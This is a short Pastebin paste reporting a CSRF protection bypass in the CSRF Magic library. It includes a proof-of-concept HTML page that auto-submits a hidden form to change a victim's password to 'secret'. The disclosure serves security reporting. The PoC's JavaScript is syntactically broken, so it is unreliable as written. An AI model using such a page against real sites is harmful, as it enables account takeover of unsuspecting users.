CSRF Magic Library

ghost_fh Nov 14th, 2019 268 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                                                         CSRF Magic Library
  3. Issue:- CSRF vulnerability.
  5. Vulnerability Description :- The CSRF Magic is vulnerable to CSRF protection bypass as it allows to
  6. tamper the csrf token values . Due to this flaw an remote attacker can exploit this vulnerability by
  7. crafting the malicious page and disperses it to the victim via social engineering ways enticing them to
  8. click the link. Once the user/victim clicks the `try again` button, attacker can takeover the account and
  9. perform untintended actions on vitim’s behalf.
  11. Steps to Reproduce :-
  12. 1. Create a malicious page containing the below values.
  14.     <!DOCTYPE html>
  15.     <html>
  16.     <body onload="document.createElement('form')'myForm'))">
  17.     <form id="myForm" action="" method="POST">
  18.     <input type=hidden name="password" value=”secret”>
  19.     <input type=hidden name=”conformed_password” value="secret">
  20.     </form>
  21.     </body>
  22.     </html>
  24. 2. Once cliked on the "Try again" button attack will get executed by asking password change.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand